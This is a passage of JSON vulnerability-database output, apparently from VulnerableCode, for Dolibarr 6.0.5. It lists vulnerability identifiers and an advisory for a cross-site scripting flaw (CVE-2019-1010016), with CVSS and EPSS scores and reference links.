h"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2017-17898","GHSA-jm38-vmgp-j7rx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uthw-1ze2-3qdc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57963?format=json","vulnerability_id":"VCID-z355-geu8-4qby","summary":"Dolibarr Cross Site Scripting (XSS)\nDolibarr 6.0.4 is affected by: Cross Site Scripting (XSS). The impact is: Cookie stealing. The component is: htdocs/product/stats/card.php. 
The attack vector is: Victim must click a specially crafted link sent by the attacker.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-1010016","reference_id":"","reference_type":"","scores":[{"value":"0.00199","scoring_system":"epss","scoring_elements":"0.41909","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-1010016"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/7962","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/7962"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-1010016","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-1010016"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/98317?format=json","purl":"pkg:composer/dolibarr/dolibarr@6.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3spa-q7qf-suez"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCI
D-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-bdx3-aeus-qkh7"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-u1mx-ymsz-wqa2"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y9z1-u3rc-yub6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http
://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}],"aliases":["CVE-2019-1010016","GHSA-97fp-5m87-r9mf"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-z355-geu8-4qby"}],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@6.0.5"}